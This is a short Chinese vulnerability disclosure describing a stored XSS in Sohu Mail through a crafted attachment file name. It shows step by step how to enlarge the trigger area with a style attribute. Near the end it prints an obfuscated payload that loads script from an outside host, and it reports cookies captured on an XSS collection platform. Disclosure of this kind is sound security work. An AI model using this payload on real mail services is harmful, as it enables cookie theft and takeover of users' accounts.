搜狐邮箱存储型XSS(危害放大技巧) 向搜狐邮箱发一封邮件,附件的名称带上单引号 ' 。
天了噜,单引号 ' 变成了双引号 " !
我们来插入onmousemove事件试试:
成功alert(1)。但是触发区域只有那么小,看上去没什么危害。这个输出点位于span标签,我们看看span标签支持什么属性:
span标签在这里已经用了id和title属性。剩下class属性必须配合id属性来调用CSS中的样式。所以只能从style属性下手了。上传附件时抓包修改文件名:
现在触发区域有这么大:
加载外部js只需要上传附件时附件名修改为如下代码即可:
MMMMMMMM' MMMMMMMMMM onmousemove='with(body)appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src=String.fromCharCode(47,47,113,113,113,46,115,105,47,100,115,118,108,76,50)' style='font-size:80px'
XSS收信平台收到了cookie:
漏洞修复方法:你们的安全部门黑客大牛多的是,只要工资按时发我相信他们肯定愿意卖力修复漏洞